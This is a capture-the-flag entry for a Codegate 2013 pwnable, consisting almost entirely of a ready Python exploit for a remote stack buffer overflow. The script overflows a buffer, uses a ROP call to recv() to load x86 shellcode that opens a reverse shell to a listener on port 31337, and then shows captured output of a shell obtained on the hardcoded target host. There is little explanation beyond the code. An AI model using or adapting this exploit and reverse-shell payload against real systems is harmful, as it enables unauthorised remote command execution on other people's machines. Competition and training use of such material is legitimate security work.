Codegate 2013 Qual - Vulnerab 200 (Exploit only)

Category : Pwnables

level2

Summary : simple stack-based remote buffer overflow

Exploit

#!/usr/bin/python from socket import * from struct import pack p = lambda x : pack("<L", x) HOST = "localhost" HOST = "58.229.122.19" PORT = 7777 recv_plt = 0x08048780 freespace = 0x0804B0f0 pr = 0x08048983 fd = 4 shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # reverse connection with /bin/sh payload = "" payload += "a"*0xef payload += p(recv_plt) payload += p(pr) payload += p(fd) payload += p(freespace) payload += p(len(shellcode)) payload += p(0) s = socket() s.connect((HOST, PORT)) s.recv(1024) s.send("write "+payload) s.recv(1024) s.send(shellcode) s.close()

root@ubuntu:~/vuln/200# ./exploit.py  ---------------------------------------------------------------- root@ubuntu:~/vuln/200# nc -lv 31337 Connection from 58.229.122.19 port 31337 [tcp/*] accepted id uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)